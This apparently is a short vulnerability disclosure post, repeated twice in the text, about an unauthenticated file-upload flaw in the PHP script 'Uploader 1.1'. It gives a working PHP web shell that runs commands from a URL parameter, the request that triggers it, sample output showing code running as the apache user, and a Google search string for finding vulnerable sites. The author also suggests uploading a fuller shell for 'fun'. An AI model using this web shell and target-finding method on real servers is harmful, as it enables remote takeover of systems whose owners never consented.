Uploader Version 1.1 which is available from
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts eg. in
PHP) onto the server
if no password protection is specified in the configuration file (default
set to off).
The supplied files will be uploaded into directory "uploads" if not
otherwise configured.
So if we create a file like this:
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
and upload it as "shellemul.php", we can execute commands by targeting our
browser to
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)
We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope (at) gmx (dot) net [email concealed])
--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts eg. in
PHP) onto the server
if no password protection is specified in the configuration file (default
set to off).
The supplied files will be uploaded into directory "uploads" if not
otherwise configured.
So if we create a file like this:
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
and upload it as "shellemul.php", we can execute commands by targeting our
browser to
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)
We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope (at) gmx (dot) net [email concealed])
--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
[ reply ]